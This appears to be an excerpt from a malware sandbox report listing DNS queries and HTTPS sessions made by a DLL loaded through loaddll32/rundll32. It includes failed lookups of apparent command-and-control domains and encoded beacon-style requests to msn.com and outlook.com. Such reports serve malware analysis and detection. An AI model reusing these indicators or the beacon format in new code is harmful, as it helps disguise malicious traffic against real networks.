                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)HHN-efz.ms-acdc.office.com52.97.137.210A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)HHN-efz.ms-acdc.office.com52.98.199.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)HHN-efz.ms-acdc.office.com52.98.223.162A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)HHN-efz.ms-acdc.office.com52.97.171.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:07.172518015 CEST8.8.8.8192.168.2.40xca44Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:13.840886116 CEST8.8.8.8192.168.2.40x8a5Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:27.260047913 CEST8.8.8.8192.168.2.40x7dbNo error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:27.740092039 CEST8.8.8.8192.168.2.40xf46fNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:34.002629995 CEST8.8.8.8192.168.2.40xb117No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:34.485994101 CEST8.8.8.8192.168.2.40x128dNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:48.117002010 CEST8.8.8.8192.168.2.40x2804Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:55.966435909 CEST8.8.8.8192.168.2.40x8958Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)FRA-efz.ms-acdc.office.com52.98.207.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)FRA-efz.ms-acdc.office.com52.98.208.34A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)FRA-efz.ms-acdc.office.com52.98.208.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)FRA-efz.ms-acdc.office.com40.101.124.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)FRA-efz.ms-acdc.office.com40.101.124.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)FRA-efz.ms-acdc.office.com40.101.9.178A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • msn.com
                                                                                                                        • outlook.com
                                                                                                                        • www.outlook.com
                                                                                                                        • outlook.office365.com

                                                                                                                        HTTPS Proxied Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.44977613.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:04 UTC0OUTGET /mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
                                                                                                                        2021-10-11 22:38:04 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:04 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 373
                                                                                                                        2021-10-11 22:38:04 UTC0INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 33 31 50 6c 61 5f 32 42 43 58 74 65 69 2f 31 52 5f 32 42 59 36 4f 2f 78 56 38 59 30 50 65 50 6f 45 78 73 4b 76 64 52 73 41 72 4c 6a 4d 54 2f 30 48 59 39 65 77 47 6c 34 64 2f 52 54 68 37 56 34 73 79 30 42 53 48 5f 32 42 74 6c 2f 39 73 71 4b 32 33 70 7a 57 31 78 59 2f 6b 50 54 36 6c 6d 76 47 59 4c 77 2f 43 66 32 49 4f 52 32 66 68 5a 54 79 4e 4c 2f
                                                                                                                        Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.2.44977913.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:11 UTC1OUTGET /mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
                                                                                                                        2021-10-11 22:38:11 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:11 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 377
                                                                                                                        2021-10-11 22:38:11 UTC2INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 4e 74 5a 67 67 71 78 49 58 32 45 46 39 77 5f 32 2f 42 61 76 54 51 30 6a 48 6b 38 7a 37 32 45 30 2f 6d 72 41 5f 32 42 4e 6f 35 66 47 66 31 38 71 53 35 33 2f 47 49 68 41 34 46 4e 70 63 2f 71 49 51 62 4a 56 6b 78 4c 48 70 49 78 33 4c 7a 4a 63 59 46 2f 33 75 51 7a 33 50 67 49 43 35 50 6a 6e 64 79 37 76 42 48 2f 69 5f 32 46 4f 61 6f 4b 36 70 55 7a 71
                                                                                                                        Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzq


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        10192.168.2.44986040.97.153.146443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:40:08 UTC14OUTGET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.com
                                                                                                                        2021-10-11 22:40:08 UTC14INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://www.outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 448417ac-9aed-bf6f-b902-bf5f92a7f6fb
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: BN6PR2001CA0022
                                                                                                                        X-RequestId: 0a3dbc15-af9f-42a8-9d5e-2a0de062e8b5
                                                                                                                        MS-CV: rBeERO2ab7+5Ar9fkqf2+w.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: BN6PR2001CA0022
                                                                                                                        Date: Mon, 11 Oct 2021 22:40:08 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        11192.168.2.44986152.98.207.194443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:40:08 UTC15OUTGET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: www.outlook.com
                                                                                                                        2021-10-11 22:40:08 UTC15INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://outlook.office365.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 6f503dd6-681b-92e6-0e33-05fdd79ea39d
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: AS9PR0301CA0009
                                                                                                                        X-RequestId: 5f53b19c-6d27-4c9c-b051-e6d331879eab
                                                                                                                        MS-CV: 1j1Qbxto5pIOMwX9156jnQ.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AS9PR0301CA0009
                                                                                                                        Date: Mon, 11 Oct 2021 22:40:08 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        12192.168.2.44986240.101.124.226443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:40:08 UTC16OUTGET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.office365.com
                                                                                                                        2021-10-11 22:40:08 UTC16INHTTP/1.1 404 Not Found
                                                                                                                        Content-Length: 1245
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: bd6df30b-3506-0654-39aa-09111fc341ce
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Alt-Svc: h3=":443",h3-29=":443"
                                                                                                                        X-CalculatedFETarget: VI1PR07CU008.internal.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-FEProxyInfo: VI1PR07CA0252.EURPRD07.PROD.OUTLOOK.COM
                                                                                                                        X-CalculatedBETarget: VI1PR01MB6621.EURPRD01.PROD.EXCHANGELABS.COM
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-RUM-Validated: 1
                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                        X-Proxy-BackendServerStatus: 404
                                                                                                                        MS-CV: C/NtvQY1VAY5qgkRH8NBzg.1.1
                                                                                                                        X-FEServer: VI1PR07CA0252
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AM5PR0101CA0012
                                                                                                                        Date: Mon, 11 Oct 2021 22:40:08 GMT
                                                                                                                        Connection: close
                                                                                                                        2021-10-11 22:40:08 UTC17INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.2.44980640.97.116.82443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:46 UTC2OUTGET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.com
                                                                                                                        2021-10-11 22:38:46 UTC2INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: d3c10e4c-5e49-3a6f-0bca-0aa8eeb05a44
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: MWHPR13CA0010
                                                                                                                        X-RequestId: dd82cfc2-7512-45b0-82e8-afbaf83fa8be
                                                                                                                        MS-CV: TA7B00lebzoLygqo7rBaRA.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: MWHPR13CA0010
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:46 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        3192.168.2.44980752.97.183.162443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:46 UTC3OUTGET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: www.outlook.com
                                                                                                                        2021-10-11 22:38:46 UTC4INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 4827db24-f7db-9519-6b3d-e535d1121fb8
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: AM7PR03CA0018
                                                                                                                        X-RequestId: f1bbbeb9-c424-4847-91c0-206d8d6abcc1
                                                                                                                        MS-CV: JNsnSNv3GZVrPeU10RIfuA.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AM7PR03CA0018
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:46 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        4192.168.2.44980852.97.218.82443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:46 UTC4OUTGET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.office365.com
                                                                                                                        2021-10-11 22:38:46 UTC5INHTTP/1.1 404 Not Found
                                                                                                                        Content-Length: 1245
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: fee0e76a-0690-24c5-d39f-a0f3ac107e50
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-CalculatedFETarget: VI1PR0102CU003.internal.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-FEProxyInfo: VI1PR0102CA0087.EURPRD01.PROD.EXCHANGELABS.COM
                                                                                                                        X-CalculatedBETarget: VI1PR04MB4495.eurprd04.prod.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-RUM-Validated: 1
                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                        X-Proxy-BackendServerStatus: 404
                                                                                                                        MS-CV: aufg/pAGxSTTn6DzrBB+UA.1.1
                                                                                                                        X-FEServer: VI1PR0102CA0087
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AS8PR04CA0081
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:46 GMT
                                                                                                                        Connection: close
